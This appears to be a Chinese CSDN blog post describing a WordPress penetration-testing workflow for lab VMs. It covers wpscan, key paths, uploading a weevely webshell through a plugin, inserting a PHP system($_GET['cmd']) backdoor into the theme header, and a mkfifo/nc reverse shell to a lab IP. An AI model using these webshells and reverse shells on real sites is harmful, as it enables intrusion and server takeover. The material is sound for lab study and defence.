wordpress测试方法

0x00 工具

wpscan

使用方法如下

https://blog.csdn.net/YouthBelief/article/details/121803913

0x01 知识点

看robots.txt 一般可能存在cms 信息

1.1版本信息

源码 30几行 可看到

在这里插入图片描述
或者wpscan 扫描

1.2目录

登录地址

wordpress/wp-login.php

插件地址

wordpress/wp-content/uploads/

后台地址

wordpress/wp-admin/

数据库文件

wordpress/wp-config.php

0x03 cms 漏洞挖掘

3.1 通过在插件上传木马 getshell

(1)
在这里插入图片描述
(2)kali 工具

	weevely generate shell back.php

在这里插入图片描述

在这里插入图片描述
(3)上传后的插件都存在于 wp-content-uploads 目录
在这里插入图片描述
(4) kali 工具 连接木马

weevely http://192.168.56.109/wordpress/wp-content/uploads/2021/12/back.php shell

在这里插入图片描述

3.2后台模板修改 php代码

Appearance—》Editor–》----》Theme Header—》 插入 php 命令执行 小马 <?php system($_GET['cmd']); ?> 最后保存

(1)
在这里插入图片描述
在这里插入图片描述

(2)访问
http://192.168.56.107/backup_wordpress/?cmd=id;ls

system 命令执行成功
在这里插入图片描述
(3) 执行 bash反弹shell
利用 上边 上传好的 system 一句话木马 反弹
bp 抓包 访问 如下 url
http://192.168.56.107/backup_wordpress/?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.137 4444 > /tmp/f

抓包后 将
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.137 4444 > /tmp/f
全部 url编码 再放包
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

反弹shell成功

0x04 靶机实例

BsidesVancouver2018

https://blog.csdn.net/YouthBelief/article/details/122112219

Stapler

https://blog.csdn.net/YouthBelief/article/details/121733762

Quaoar

https://blog.csdn.net/YouthBelief/article/details/122220120
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值